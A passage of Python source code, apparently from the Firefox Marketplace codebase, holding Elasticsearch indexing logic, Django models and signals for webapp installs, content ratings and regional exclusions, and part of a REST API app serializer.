'version': {'type': 'string',
'index': 'not_analyzed'},
'resource_uri': {'type': 'string',
'index': 'not_analyzed'},
}
},
'weekly_downloads': {'type': 'long'},
'weight': {'type': 'short'},
}
}
}
# Add popularity by region.
for region in mkt.regions.ALL_REGION_IDS:
mapping[doc_type]['properties'].update(
{'popularity_%s' % region: {'type': 'long'}})
# Add fields that we expect to return all translations.
for field in ('banner_message', 'description', 'homepage', 'name',
'release_notes', 'support_email', 'support_url'):
mapping[doc_type]['properties'].update({
'%s_translations' % field: {
'type': 'object',
'properties': {
'lang': {'type': 'string',
'index': 'not_analyzed'},
'string': {'type': 'string',
'index': 'not_analyzed'},
}
}
})
# Add room for language-specific indexes.
for analyzer in amo.SEARCH_ANALYZER_MAP:
if (not settings.ES_USE_PLUGINS and
analyzer in amo.SEARCH_ANALYZER_PLUGINS):
log.info('While creating mapping, skipping the %s analyzer'
% analyzer)
continue
mapping[doc_type]['properties'].update(
_locale_field_mapping('name', analyzer))
mapping[doc_type]['properties'].update(
_locale_field_mapping('description', analyzer))
# TODO: reviewer flags (bug 848446)
return mapping
@classmethod
def extract_document(cls, pk, obj=None):
"""Extracts the ElasticSearch index document for this instance."""
if obj is None:
obj = cls.get_model().objects.no_cache().get(pk=pk)
latest_version = obj.latest_version
version = obj.current_version
geodata = obj.geodata
features = (version.features.to_dict()
if version else AppFeatures().to_dict())
is_escalated = obj.escalationqueue_set.exists()
try:
status = latest_version.statuses[0][1] if latest_version else None
except IndexError:
status = None
installed_ids = list(Installed.objects.filter(addon=obj)
.values_list('id', flat=True))
attrs = ('app_slug', 'average_daily_users', 'bayesian_rating',
'created', 'id', 'is_disabled', 'last_updated', 'modified',
'premium_type', 'status', 'type', 'uses_flash',
'weekly_downloads')
d = dict(zip(attrs, attrgetter(*attrs)(obj)))
d['app_type'] = obj.app_type_id
d['author'] = obj.developer_name
d['banner_regions'] = geodata.banner_regions_slugs()
d['category'] = list(obj.categories.values_list('slug', flat=True))
if obj.is_public:
d['collection'] = [{'id': cms.collection_id, 'order': cms.order}
for cms in obj.collectionmembership_set.all()]
else:
d['collection'] = []
d['content_ratings'] = (obj.get_content_ratings_by_body(es=True) or
None)
d['content_descriptors'] = obj.get_descriptors_slugs()
d['current_version'] = version.version if version else None
d['default_locale'] = obj.default_locale
d['description'] = list(
set(string for _, string in obj.translations[obj.description_id]))
d['device'] = getattr(obj, 'device_ids', [])
d['features'] = features
d['has_public_stats'] = obj.public_stats
d['icon_hash'] = obj.icon_hash
d['interactive_elements'] = obj.get_interactives_slugs()
d['is_escalated'] = is_escalated
d['is_offline'] = getattr(obj, 'is_offline', False)
if latest_version:
d['latest_version'] = {
'status': status,
'is_privileged': latest_version.is_privileged,
'has_editor_comment': latest_version.has_editor_comment,
'has_info_request': latest_version.has_info_request,
}
else:
d['latest_version'] = {
'status': None,
'is_privileged': None,
'has_editor_comment': None,
'has_info_request': None,
}
d['manifest_url'] = obj.get_manifest_url()
d['name'] = list(
set(string for _, string in obj.translations[obj.name_id]))
d['name_sort'] = unicode(obj.name).lower()
d['owners'] = [au.user.id for au in
obj.addonuser_set.filter(role=amo.AUTHOR_ROLE_OWNER)]
d['popularity'] = d['_boost'] = len(installed_ids)
d['previews'] = [{'filetype': p.filetype, 'modified': p.modified,
'id': p.id} for p in obj.previews.all()]
try:
p = obj.addonpremium.price
d['price_tier'] = p.name
except AddonPremium.DoesNotExist:
d['price_tier'] = None
d['ratings'] = {
'average': obj.average_rating,
'count': obj.total_reviews,
}
d['region_exclusions'] = obj.get_excluded_region_ids()
d['reviewed'] = obj.versions.filter(
deleted=False).aggregate(Min('reviewed')).get('reviewed__min')
if version:
d['supported_locales'] = filter(
None, version.supported_locales.split(','))
else:
d['supported_locales'] = []
d['tags'] = getattr(obj, 'tag_list', [])
if obj.upsell and obj.upsell.premium.is_public():
upsell_obj = obj.upsell.premium
d['upsell'] = {
'id': upsell_obj.id,
'app_slug': upsell_obj.app_slug,
'icon_url': upsell_obj.get_icon_url(128),
# TODO: Store all localizations of upsell.name.
'name': unicode(upsell_obj.name),
'region_exclusions': upsell_obj.get_excluded_region_ids()
}
d['versions'] = [dict(version=v.version,
resource_uri=reverse_version(v))
for v in obj.versions.all()]
# Calculate weight. It's similar to popularity, except that we can
# expose the number - it's relative to the max weekly downloads for
# the whole database.
max_downloads = float(
Webapp.objects.aggregate(Max('weekly_downloads')).values()[0] or 0)
if max_downloads:
d['weight'] = math.ceil(d['weekly_downloads'] / max_downloads * 5)
else:
d['weight'] = 1
# Handle our localized fields.
for field in ('description', 'homepage', 'name', 'support_email',
'support_url'):
d['%s_translations' % field] = [
{'lang': to_language(lang), 'string': string}
for lang, string
in obj.translations[getattr(obj, '%s_id' % field)]
if string]
if version:
amo.utils.attach_trans_dict(Version, [version])
d['release_notes_translations'] = [
{'lang': to_language(lang), 'string': string}
for lang, string
in version.translations[version.releasenotes_id]]
else:
d['release_notes_translations'] = None
amo.utils.attach_trans_dict(Geodata, [geodata])
d['banner_message_translations'] = [
{'lang': to_language(lang), 'string': string}
for lang, string
in geodata.translations[geodata.banner_message_id]]
for region in mkt.regions.ALL_REGION_IDS:
d['popularity_%s' % region] = d['popularity']
# Bump the boost if the add-on is public.
if obj.status == amo.STATUS_PUBLIC:
d['_boost'] = max(d['_boost'], 1) * 4
# If the app is compatible with Firefox OS, push suggestion data in the
# index - This will be used by RocketbarView API, which is specific to
# Firefox OS.
if DEVICE_GAIA.id in d['device'] and obj.is_public():
d['name_suggest'] = {
'input': d['name'],
'output': unicode(obj.id), # We only care about the payload.
'weight': d['_boost'],
'payload': {
'default_locale': d['default_locale'],
'icon_hash': d['icon_hash'],
'id': d['id'],
'manifest_url': d['manifest_url'],
'modified': d['modified'],
'name_translations': d['name_translations'],
'slug': d['app_slug'],
}
}
# Indices for each language. languages is a list of locales we want to
# index with analyzer if the string's locale matches.
for analyzer, languages in amo.SEARCH_ANALYZER_MAP.iteritems():
if (not settings.ES_USE_PLUGINS and
analyzer in amo.SEARCH_ANALYZER_PLUGINS):
continue
d['name_' + analyzer] = list(
set(string for locale, string in obj.translations[obj.name_id]
if locale.lower() in languages))
d['description_' + analyzer] = list(
set(string for locale, string
in obj.translations[obj.description_id]
if locale.lower() in languages))
return d
@classmethod
def get_indexable(cls):
"""Returns the queryset of ids of all things to be indexed."""
return (Webapp.with_deleted.all()
.order_by('-id').values_list('id', flat=True))
# Set translated_fields manually to avoid querying translations for addon
# fields we don't use.
Webapp._meta.translated_fields = [
Webapp._meta.get_field('homepage'),
Webapp._meta.get_field('privacy_policy'),
Webapp._meta.get_field('name'),
Webapp._meta.get_field('description'),
Webapp._meta.get_field('support_email'),
Webapp._meta.get_field('support_url'),
]
@receiver(dbsignals.post_save, sender=Webapp,
dispatch_uid='webapp.search.index')
def update_search_index(sender, instance, **kw):
from . import tasks
if not kw.get('raw'):
if instance.upsold and instance.upsold.free_id:
tasks.index_webapps.delay([instance.upsold.free_id])
tasks.index_webapps.delay([instance.id])
@receiver(dbsignals.post_save, sender=AddonUpsell,
dispatch_uid='addonupsell.search.index')
def update_search_index_upsell(sender, instance, **kw):
# When saving an AddonUpsell instance, reindex both apps to update their
# upsell/upsold properties in ES.
from . import tasks
if instance.free:
tasks.index_webapps.delay([instance.free.id])
if instance.premium:
tasks.index_webapps.delay([instance.premium.id])
models.signals.pre_save.connect(save_signal, sender=Webapp,
dispatch_uid='webapp_translations')
@receiver(version_changed, dispatch_uid='update_cached_manifests')
def update_cached_manifests(sender, **kw):
if not kw.get('raw') and sender.is_packaged:
from mkt.webapps.tasks import update_cached_manifests
update_cached_manifests.delay(sender.id)
@Webapp.on_change
def watch_status(old_attr={}, new_attr={}, instance=None, sender=None, **kw):
"""Set nomination date when app is pending review."""
new_status = new_attr.get('status')
if not new_status:
return
addon = instance
old_status = old_attr['status']
# Log all status changes.
if old_status != new_status:
log.info(
'[Webapp:{id}] Status changed from {old_status}:{old_status_name} '
'to {new_status}:{new_status_name}'.format(
id=addon.id, old_status=old_status,
old_status_name=amo.STATUS_CHOICES_API[old_status],
new_status=new_status,
new_status_name=amo.STATUS_CHOICES_API[new_status]))
if new_status == amo.STATUS_PENDING and old_status != new_status:
# We always set nomination date when app switches to PENDING, even if
# previously rejected.
try:
latest = addon.versions.latest()
log.debug('[Webapp:%s] Setting nomination date to now.' % addon.id)
latest.update(nomination=datetime.datetime.now())
except Version.DoesNotExist:
log.debug('[Webapp:%s] Missing version, no nomination set.'
% addon.id)
@receiver(dbsignals.post_save, sender=Webapp,
dispatch_uid='webapp.pre_generate_apk')
def pre_generate_apk(sender=None, instance=None, **kw):
"""
Pre-generate an Android APK for a public app.
"""
if kw.get('raw'):
return
if not getattr(settings, 'PRE_GENERATE_APKS', False):
log.info('[Webapp:{a}] APK pre-generation is disabled.'
.format(a=instance.id))
return
from . import tasks
generated = False
if instance.status in amo.WEBAPPS_APPROVED_STATUSES:
app_devs = set(d.id for d in instance.device_types)
if (amo.DEVICE_MOBILE.id in app_devs or
amo.DEVICE_TABLET.id in app_devs):
tasks.pre_generate_apk.delay(instance.id)
generated = True
log.info('[Webapp:{a}] APK pre-generated? {result}'
.format(a=instance.id, result='YES' if generated else 'NO'))
class Installed(amo.models.ModelBase):
"""Track WebApp installations."""
addon = models.ForeignKey('addons.Addon', related_name='installed')
user = models.ForeignKey('users.UserProfile')
uuid = models.CharField(max_length=255, db_index=True, unique=True)
# Because the addon could change between free and premium,
# we need to store the state at time of install here.
premium_type = models.PositiveIntegerField(
null=True, default=None, choices=amo.ADDON_PREMIUM_TYPES.items())
install_type = models.PositiveIntegerField(
db_index=True, default=apps.INSTALL_TYPE_USER,
choices=apps.INSTALL_TYPES.items())
class Meta:
db_table = 'users_install'
unique_together = ('addon', 'user', 'install_type')
@receiver(models.signals.post_save, sender=Installed)
def add_uuid(sender, **kw):
if not kw.get('raw'):
install = kw['instance']
if not install.uuid and install.premium_type is None:
install.uuid = ('%s-%s' % (install.pk, str(uuid.uuid4())))
install.premium_type = install.addon.premium_type
install.save()
class AddonExcludedRegion(amo.models.ModelBase):
"""
Apps are listed in all regions by default.
When regions are unchecked, we remember those excluded regions.
"""
addon = models.ForeignKey('addons.Addon',
related_name='addonexcludedregion')
region = models.PositiveIntegerField(
choices=mkt.regions.REGIONS_CHOICES_ID)
class Meta:
db_table = 'addons_excluded_regions'
unique_together = ('addon', 'region')
def __unicode__(self):
region = self.get_region()
return u'%s: %s' % (self.addon, region.slug if region else None)
def get_region(self):
return mkt.regions.REGIONS_CHOICES_ID_DICT.get(self.region)
@memoize(prefix='get_excluded_in')
def get_excluded_in(region_id):
"""
Return IDs of Webapp objects excluded from a particular region or excluded
due to Geodata flags.
"""
aers = list(AddonExcludedRegion.objects.filter(region=region_id)
.values_list('addon', flat=True))
# For pre-IARC unrated games in Brazil/Germany.
geodata_qs = Q()
region = parse_region(region_id)
if region in (mkt.regions.BR, mkt.regions.DE):
geodata_qs |= Q(**{'region_%s_iarc_exclude' % region.slug: True})
# For USK_RATING_REFUSED apps in Germany.
if region == mkt.regions.DE:
geodata_qs |= Q(**{'region_de_usk_exclude': True})
geodata_exclusions = []
if geodata_qs:
geodata_exclusions = list(Geodata.objects.filter(geodata_qs)
.values_list('addon', flat=True))
return set(aers + geodata_exclusions)
@receiver(models.signals.post_save, sender=AddonExcludedRegion,
dispatch_uid='clean_memoized_exclusions')
def clean_memoized_exclusions(sender, **kw):
if not kw.get('raw'):
for k in mkt.regions.ALL_REGION_IDS:
cache.delete_many([memoize_key('get_excluded_in', k)
for k in mkt.regions.ALL_REGION_IDS])
class IARCInfo(amo.models.ModelBase):
"""
Stored data for IARC.
"""
addon = models.OneToOneField(Addon, related_name='iarc_info')
submission_id = models.PositiveIntegerField(null=False)
security_code = models.CharField(max_length=10)
class Meta:
db_table = 'webapps_iarc_info'
def __unicode__(self):
return u'app:%s' % self.addon.app_slug
class ContentRating(amo.models.ModelBase):
"""
Ratings body information about an app.
"""
addon = models.ForeignKey('addons.Addon', related_name='content_ratings')
ratings_body = models.PositiveIntegerField(
choices=[(k, rb.name) for k, rb in
mkt.ratingsbodies.RATINGS_BODIES.items()],
null=False)
rating = models.PositiveIntegerField(null=False)
class Meta:
db_table = 'webapps_contentrating'
unique_together = ('addon', 'ratings_body')
def __unicode__(self):
return u'%s: %s' % (self.addon, self.get_label())
def get_regions(self):
"""Gives us a list of Region classes that use this rating body."""
# All regions w/o specified ratings bodies fallback to Generic.
generic_regions = []
if (waffle.switch_is_active('iarc') and
self.get_body_class() == mkt.ratingsbodies.GENERIC):
generic_regions = mkt.regions.ALL_REGIONS_WITHOUT_CONTENT_RATINGS()
return ([x for x in mkt.regions.ALL_REGIONS_WITH_CONTENT_RATINGS()
if self.get_body_class() == x.ratingsbody] +
list(generic_regions))
def get_region_slugs(self):
"""Gives us the region slugs that use this rating body."""
if (waffle.switch_is_active('iarc') and
self.get_body_class() == mkt.ratingsbodies.GENERIC):
# For the generic rating body, we just pigeonhole all of the misc.
# regions into one region slug, GENERIC. Reduces redundancy in the
# final data structure. Rather than
# {'pe': {generic_rating}, 'ar': {generic_rating}, etc}, generic
# regions will just use single {'generic': {generic rating}}
return [mkt.regions.GENERIC_RATING_REGION_SLUG]
return [x.slug for x in self.get_regions()]
def get_body_class(self):
return mkt.ratingsbodies.RATINGS_BODIES[self.ratings_body]
def get_body(self):
"""Ratings body instance with translated strings attached."""
return mkt.ratingsbodies.dehydrate_ratings_body(self.get_body_class())
def get_rating_class(self):
return self.get_body_class().ratings[self.rating]
def get_rating(self):
"""Ratings instance with translated strings attached."""
return mkt.ratingsbodies.dehydrate_rating(self.get_rating_class())
def get_label(self):
"""Gives us the name to be used for the form options."""
return u'%s - %s' % (self.get_body().name, self.get_rating().name)
def update_status_content_ratings(sender, instance, **kw):
# Flips the app's status from NULL if it has everything else together.
if (instance.addon.has_incomplete_status() and
instance.addon.is_fully_complete()):
instance.addon.update(status=amo.STATUS_PENDING)
models.signals.post_save.connect(update_status_content_ratings,
sender=ContentRating,
dispatch_uid='c_rating_update_app_status')
# The RatingDescriptors table is created with dynamic fields based on
# mkt.constants.ratingdescriptors.
class RatingDescriptors(amo.models.ModelBase, DynamicBoolFieldsMixin):
"""
A dynamically generated model that contains a set of boolean values
stating if an app is rated with a particular descriptor.
"""
addon = models.OneToOneField(Addon, related_name='rating_descriptors')
field_source = mkt.ratingdescriptors.RATING_DESCS
class Meta:
db_table = 'webapps_rating_descriptors'
def __unicode__(self):
return u'%s: %s' % (self.id, self.addon.name)
def iarc_deserialize(self, body=None):
"""Map our descriptor strings back to the IARC ones (comma-sep.)."""
keys = self.to_keys()
if body:
keys = [key for key in keys if body.iarc_name.lower() in key]
return ', '.join(REVERSE_DESC_MAPPING.get(desc) for desc in keys)
# Add a dynamic field to `RatingDescriptors` model for each rating descriptor.
for k, v in mkt.ratingdescriptors.RATING_DESCS.iteritems():
field = models.BooleanField(default=False, help_text=v['name'])
field.contribute_to_class(RatingDescriptors, 'has_%s' % k.lower())
# The RatingInteractives table is created with dynamic fields based on
# mkt.constants.ratinginteractives.
class RatingInteractives(amo.models.ModelBase, DynamicBoolFieldsMixin):
"""
A dynamically generated model that contains a set of boolean values
stating if an app features a particular interactive element.
"""
addon = models.OneToOneField(Addon, related_name='rating_interactives')
field_source = mkt.ratinginteractives.RATING_INTERACTIVES
class Meta:
db_table = 'webapps_rating_interactives'
def __unicode__(self):
return u'%s: %s' % (self.id, self.addon.name)
def iarc_deserialize(self):
"""Map our descriptor strings back to the IARC ones (comma-sep.)."""
return ', '.join(REVERSE_INTERACTIVES_MAPPING.get(inter)
for inter in self.to_keys())
# Add a dynamic field to `RatingInteractives` model for each rating descriptor.
for k, v in mkt.ratinginteractives.RATING_INTERACTIVES.iteritems():
field = models.BooleanField(default=False, help_text=v['name'])
field.contribute_to_class(RatingInteractives, 'has_%s' % k.lower())
def iarc_cleanup(*args, **kwargs):
instance = kwargs.get('instance')
IARCInfo.objects.filter(addon=instance).delete()
ContentRating.objects.filter(addon=instance).delete()
RatingDescriptors.objects.filter(addon=instance).delete()
RatingInteractives.objects.filter(addon=instance).delete()
# When an app is deleted we need to remove the IARC data so the certificate can
# be re-used later.
models.signals.post_delete.connect(iarc_cleanup, sender=Addon,
dispatch_uid='webapps_iarc_cleanup')
# The AppFeatures table is created with dynamic fields based on
# mkt.constants.features, which requires some setup work before we call `type`.
class AppFeatures(amo.models.ModelBase, DynamicBoolFieldsMixin):
"""
A dynamically generated model that contains a set of boolean values
stating if an app requires a particular feature.
"""
version = models.OneToOneField(Version, related_name='features')
field_source = APP_FEATURES
class Meta:
db_table = 'addons_features'
def __unicode__(self):
return u'Version: %s: %s' % (self.version.id, self.to_signature())
def set_flags(self, signature):
"""
Sets flags given the signature.
This takes the reverse steps in `to_signature` to set the various flags
given a signature. Boolean math is used since "0.23.1" is a valid
signature but does not produce a string of required length when doing
string indexing.
"""
fields = self._fields()
# Grab the profile part of the signature and convert to binary string.
try:
profile = bin(int(signature.split('.')[0], 16)).lstrip('0b')
n = len(fields) - 1
for i, f in enumerate(fields):
setattr(self, f, bool(int(profile, 2) & 2 ** (n - i)))
except ValueError as e:
log.error(u'ValueError converting %s. %s' % (signature, e))
def to_signature(self):
"""
This converts the boolean values of the flags to a signature string.
For example, all the flags in APP_FEATURES order produce a string of
binary digits that is then converted to a hexadecimal string with the
length of the features list plus a version appended. E.g.::
>>> profile = '10001010111111010101011'
>>> int(profile, 2)
4554411
>>> '%x' % int(profile, 2)
'457eab'
>>> '%x.%s.%s' % (int(profile, 2), len(profile), 1)
'457eab.23.1'
"""
profile = ''.join('1' if getattr(self, f) else '0'
for f in self._fields())
return '%x.%s.%s' % (int(profile, 2), len(profile),
settings.APP_FEATURES_VERSION)
# Add a dynamic field to `AppFeatures` model for each buchet feature.
for k, v in APP_FEATURES.iteritems():
field = models.BooleanField(default=False, help_text=v['name'])
field.contribute_to_class(AppFeatures, 'has_%s' % k.lower())
class AppManifest(amo.models.ModelBase):
"""
Storage for manifests.
Tied to version since they change between versions. This stores both hosted
and packaged apps manifests for easy access.
"""
version = models.OneToOneField(Version, related_name='manifest_json')
manifest = models.TextField()
class Meta:
db_table = 'app_manifest'
class RegionListField(json_field.JSONField):
def to_python(self, value):
value = super(RegionListField, self).to_python(value)
if value:
value = [int(v) for v in value]
return value
class Geodata(amo.models.ModelBase):
"""TODO: Forgo AER and use bool columns for every region and carrier."""
addon = models.OneToOneField('addons.Addon', related_name='_geodata')
restricted = models.BooleanField(default=False)
popular_region = models.CharField(max_length=10, null=True)
banner_regions = RegionListField(default=None, null=True)
banner_message = PurifiedField()
# Exclude apps with USK_RATING_REFUSED in Germany.
region_de_usk_exclude = models.BooleanField(default=False)
class Meta:
db_table = 'webapps_geodata'
def __unicode__(self):
return u'%s (%s): <Webapp %s>' % (
self.id, 'restricted' if self.restricted else 'unrestricted',
self.addon.id)
def get_status(self, region):
"""
Return the status of listing in a given region (e.g., China).
"""
return getattr(self, 'region_%s_status' % parse_region(region).slug,
amo.STATUS_PUBLIC)
def set_status(self, region, status, save=False):
"""Return a tuple of `(value, changed)`."""
value, changed = None, False
attr = 'region_%s_status' % parse_region(region).slug
if hasattr(self, attr):
value = setattr(self, attr, status)
if self.get_status(region) != value:
changed = True
# Save only if the value is different.
if save:
self.save()
return None, changed
def get_status_slug(self, region):
return {
amo.STATUS_PENDING: 'pending',
amo.STATUS_PUBLIC: 'public',
amo.STATUS_REJECTED: 'rejected',
}.get(self.get_status(region), 'unavailable')
@classmethod
def get_status_messages(cls):
return {
# L10n: An app is awaiting approval for a particular region.
'pending': _('awaiting approval'),
# L10n: An app is rejected for a particular region.
'rejected': _('rejected'),
# L10n: An app requires additional review for a particular region.
'unavailable': _('requires additional review')
}
def banner_regions_names(self):
if self.banner_regions is None:
return []
return sorted(unicode(mkt.regions.REGIONS_CHOICES_ID_DICT.get(k).name)
for k in self.banner_regions)
def banner_regions_slugs(self):
if self.banner_regions is None:
return []
return sorted(unicode(mkt.regions.REGIONS_CHOICES_ID_DICT.get(k).slug)
for k in self.banner_regions)
def get_nominated_date(self, region):
"""
Return the timestamp of when the app was approved in a region.
"""
return getattr(self,
'region_%s_nominated' % parse_region(region).slug)
def set_nominated_date(self, region, timestamp=None, save=False):
"""Return a tuple of `(value, saved)`."""
value, changed = None, False
attr = 'region_%s_nominated' % parse_region(region).slug
if hasattr(self, attr):
if timestamp is None:
timestamp = datetime.datetime.now()
value = setattr(self, attr, timestamp)
if self.get_nominated_date(region) != value:
changed = True
# Save only if the value is different.
if save:
self.save()
return None, changed
# (1) Add a dynamic status field to `Geodata` model for each special region:
# - 0: STATUS_NULL (Unavailable)
# - 2: STATUS_PENDING (Pending)
# - 4: STATUS_PUBLIC (Public)
# - 12: STATUS_REJECTED (Rejected)
#
# (2) Add a dynamic nominated field to keep track of timestamp for when
# the developer requested approval for each region.
for region in mkt.regions.SPECIAL_REGIONS:
help_text = _('{region} approval status').format(region=region.name)
field = models.PositiveIntegerField(help_text=help_text,
choices=amo.MKT_STATUS_CHOICES.items(), db_index=True, default=0)
field.contribute_to_class(Geodata, 'region_%s_status' % region.slug)
help_text = _('{region} nomination date').format(region=region.name)
field = models.DateTimeField(help_text=help_text, null=True)
field.contribute_to_class(Geodata, 'region_%s_nominated' % region.slug)
# Add a dynamic field to `Geodata` model to exclude pre-IARC public unrated
# Brazil and Germany games.
for region in (mkt.regions.BR, mkt.regions.DE):
field = models.BooleanField(default=False)
field.contribute_to_class(Geodata, 'region_%s_iarc_exclude' % region.slug)
# Save geodata translations when a Geodata instance is saved.
models.signals.pre_save.connect(save_signal, sender=Geodata,
dispatch_uid='geodata_translations')
########NEW FILE########
__FILENAME__ = serializers
import json
from decimal import Decimal
from django.core.urlresolvers import reverse
from rest_framework import response, serializers
from tower import ungettext as ngettext
import amo
from addons.models import AddonCategory, AddonUpsell, Category
from amo.utils import no_translation
from constants.payments import PROVIDER_BANGO
import mkt
from mkt.api.fields import (LargeTextField, SemiSerializerMethodField,
ReverseChoiceField, TranslationSerializerField)
from mkt.constants.features import FeatureProfile
from mkt.submit.forms import mark_for_rereview
from mkt.submit.serializers import PreviewSerializer, SimplePreviewSerializer
from mkt.webapps.models import AppFeatures, Webapp
from mkt.prices.models import AddonPremium, Price
class AppFeaturesSerializer(serializers.ModelSerializer):
class Meta:
model = AppFeatures
def to_native(self, obj):
ret = super(AppFeaturesSerializer, self).to_native(obj)
profile = FeatureProfile.from_signature(obj.to_signature())
ret['required'] = profile.to_list()
return ret
def http_error(errorclass, reason, extra_data=None):
r = errorclass()
data = {'reason': reason}
if extra_data:
data.update(extra_data)
r.content = json.dumps(data)
return response.Response(r)
class RegionSerializer(serializers.Serializer):
name = serializers.CharField()
slug = serializers.CharField()
mcc = serializers.CharField()
adolescent = serializers.BooleanField()
class AppSerializer(serializers.ModelSerializer):
app_type = serializers.ChoiceField(
choices=amo.ADDON_WEBAPP_TYPES_LOOKUP.items(), read_only=True)
author = serializers.CharField(source='developer_name', read_only=True)
banner_message = TranslationSerializerField(read_only=True,
source='geodata.banner_message')
banner_regions = serializers.Field(source='geodata.banner_regions_slugs')
categories = serializers.SlugRelatedField(source='categories',
many=True, slug_field='slug', required=True,
queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
content_ratings = serializers.SerializerMethodField('get_content_ratings')
created = serializers.DateField(read_only=True)
current_version = serializers.CharField(
source='current_version.version',
read_only=True)
default_locale = serializers.CharField(read_only=True)
device_types = SemiSerializerMethodField('get_device_types')
description = TranslationSerializerField(required=False)
homepage = TranslationSerializerField(required=False)
icons = serializers.SerializerMethodField('get_icons')
id = serializers.IntegerField(source='pk', required=False)
is_packaged = serializers.BooleanField(read_only=True)
manifest_url = serializers.CharField(source='get_manifest_url',
read_only=True)
name = TranslationSerializerField(required=False)
payment_account = serializers.SerializerMethodField('get_payment_account')
payment_required = serializers.SerializerMethodField(
'get_payment_required')
premium_type = ReverseChoiceField(
choices_dict=amo.ADDON_PREMIUM_API, required=False)
previews = PreviewSerializer(many=True, required=False,
source='all_previews')
price = SemiSerializerMethodField('get_price')
price_locale = serializers.SerializerMethodField('get_price_locale')
privacy_policy = LargeTextField(view_name='app-privacy-policy-detail',
required=False)
public_stats = serializers.BooleanField(read_only=True)
ratings = serializers.SerializerMethodField('get_ratings_aggregates')
regions = RegionSerializer(read_only=True, source='get_regions')
release_notes = TranslationSerializerField(read_only=True,
source='current_version.releasenotes')
resource_uri = serializers.HyperlinkedIdentityField(view_name='app-detail')
slug = serializers.CharField(source='app_slug', required=False)
status = serializers.IntegerField(read_only=True)
support_email = TranslationSerializerField(required=False)
support_url = TranslationSerializerField(required=False)
supported_locales = serializers.SerializerMethodField(
'get_supported_locales')
tags = serializers.SerializerMethodField('get_tags')
upsell = serializers.SerializerMethodField('get_upsell')
upsold = serializers.HyperlinkedRelatedField(
view_name='app-detail', source='upsold.free',
required=False, queryset=Webapp.objects.all())
user = serializers.SerializerMethodField('get_user_info')
versions = serializers.SerializerMethodField('get_versions')
weekly_downloads = serializers.SerializerMethodField(
'get_weekly_downloads')
class Meta:
model = Webapp
fields = [
'app_type', 'author', 'banner_message', 'banner_regions',
'categories', 'content_ratings', 'created', 'current_version',
'default_locale', 'description', 'device_types', 'homepage',
'icons', 'id', 'is_packaged', 'manifest_url', 'name',
'payment_account', 'payment_required', 'premium_type', 'previews',
'price', 'price_locale', 'privacy_policy', 'public_stats',
'release_notes', 'ratings', 'regions', 'resource_uri', 'slug',
'status', 'support_email', 'support_url', 'supported_locales',
'tags', 'upsell', 'upsold', 'user', 'versions', 'weekly_downloads']
def _get_region_id(self):
request = self.context.get('request')
REGION = getattr(request, 'REGION', None)
return REGION.id if REGION else None
def _get_region_slug(self):
request = self.context.get('request')
REGION = getattr(request, 'REGION', None)
return REGION.slug if REGION else None
def get_content_ratings(self, app):
body = mkt.regions.REGION_TO_RATINGS_BODY().get(
self._get_region_slug(), 'generic')
return {
'body': body,
'rating': app.get_content_ratings_by_body().get(body, None),
'descriptors': app.get_descriptors_dehydrated().get(body, []),
'interactives': app.get_interactives_dehydrated(),
}
def get_icons(self, app):
return dict([(icon_size, app.get_icon_url(icon_size))
for icon_size in (16, 48, 64, 128)])
def get_payment_account(self, app):
# Avoid a query for payment_account if the app is not premium.
if not app.is_premium():
return None
try:
# This is a soon to be deprecated API property that only
# returns the Bango account for historic compatibility.
app_acct = app.payment_account(PROVIDER_BANGO)
return reverse('payment-account-detail',
args=[app_acct.payment_account.pk])
except app.PayAccountDoesNotExist:
return None
def get_payment_required(self, app):
if app.has_premium():
tier = app.get_tier()
return bool(tier and tier.price)
return False
def get_price(self, app):
if app.has_premium():
region = self._get_region_id()
if region in app.get_price_region_ids():
return app.get_price(region=region)
return None
def get_price_locale(self, app):
if app.has_premium():
region = self._get_region_id()
if region in app.get_price_region_ids():
return app.get_price_locale(region=region)
return None
def get_ratings_aggregates(self, app):
return {'average': app.average_rating,
'count': app.total_reviews}
def get_supported_locales(self, app):
locs = getattr(app.current_version, 'supported_locales', '')
if locs:
return locs.split(',') if isinstance(locs, basestring) else locs
else:
return []
def get_tags(self, app):
return [t.tag_text for t in app.tags.all()]
def get_upsell(self, app):
upsell = False
if app.upsell:
upsell = app.upsell.premium
# Only return the upsell app if it's public and we are not in an
# excluded region.
if (upsell and upsell.is_public() and self._get_region_id()
not in upsell.get_excluded_region_ids()):
return {
'id': upsell.id,
'app_slug': upsell.app_slug,
'icon_url': upsell.get_icon_url(128),
'name': unicode(upsell.name),
'resource_uri': reverse('app-detail', kwargs={'pk': upsell.pk})
}
else:
return False
def get_user_info(self, app):
user = getattr(self.context.get('request'), 'amo_user', None)
if user:
return {
'developed': app.addonuser_set.filter(
user=user, role=amo.AUTHOR_ROLE_OWNER).exists(),
'installed': app.has_installed(user),
'purchased': app.pk in user.purchase_ids(),
}
def get_versions(self, app):
# Disable transforms, we only need two fields: version and pk.
# Unfortunately, cache-machine gets in the way so we can't use .only()
# (.no_transforms() is ignored, defeating the purpose), and we can't use
# .values() / .values_list() because those aren't cached :(
return dict((v.version, reverse('version-detail', kwargs={'pk': v.pk}))
for v in app.versions.all().no_transforms())
def get_weekly_downloads(self, app):
if app.public_stats:
return app.weekly_downloads
def validate_categories(self, attrs, source):
if not attrs.get('categories'):
raise serializers.ValidationError('This field is required.')
set_categories = set(attrs[source])
total = len(set_categories)
max_cat = amo.MAX_CATEGORIES
if total > max_cat:
# L10n: {0} is the number of categories.
raise serializers.ValidationError(ngettext(
'You can have only {0} category.',
'You can have only {0} categories.',
max_cat).format(max_cat))
return attrs
def get_device_types(self, app):
with no_translation():
return [n.api_name for n in app.device_types]
def save_device_types(self, obj, new_types):
new_types = [amo.DEVICE_LOOKUP[d].id for d in new_types]
old_types = [x.id for x in obj.device_types]
added_devices = set(new_types) - set(old_types)
removed_devices = set(old_types) - set(new_types)
for d in added_devices:
obj.addondevicetype_set.create(device_type=d)
for d in removed_devices:
obj.addondevicetype_set.filter(device_type=d).delete()
# Send app to re-review queue if public and new devices are added.
if added_devices and obj.status in amo.WEBAPPS_APPROVED_STATUSES:
mark_for_rereview(obj, added_devices, removed_devices)
def save_categories(self, obj, categories):
before = set(obj.categories.values_list('id', flat=True))
# Add new categories.
to_add = set(c.id for c in categories) - before
for c in to_add:
AddonCategory.objects.create(addon=obj, category_id=c)
# Remove old categories.
to_remove = before - set(categories)
for c in to_remove:
obj.addoncategory_set.filter(category=c).delete()
def save_upsold(self, obj, upsold):
current_upsell = obj.upsold
if upsold and upsold != obj.upsold.free:
if not current_upsell:
log.debug('[1@%s] Creating app upsell' % obj.pk)
current_upsell = AddonUpsell(premium=obj)
